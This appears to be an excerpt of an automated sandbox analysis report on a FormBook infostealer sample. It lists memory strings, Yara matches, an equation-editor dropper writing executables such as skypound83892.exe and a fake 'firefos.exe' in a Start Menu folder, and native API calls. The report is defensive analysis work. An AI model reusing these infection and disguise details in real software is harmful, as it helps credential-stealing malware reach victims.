          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000007.00000000.2168339499.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2149028138.0000000004297000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2180035893.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000007.00000000.2138753603.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_004181C0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00418270 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_004182F0 NtClose,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_004181BB NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0041826B NtReadFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_004182EA NtClose,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0041839D NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_009400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00940048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00940078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_009407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_009410D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00940060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_009401D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0094010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00941148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00941930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00940C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_00941D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe | Code function: 6_2_0093FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_021400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_021407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02140048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02140078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02140060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_021410D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0214010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02141148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_021401D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02141930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02140C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0213FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02141D80 NtSuspendThread,
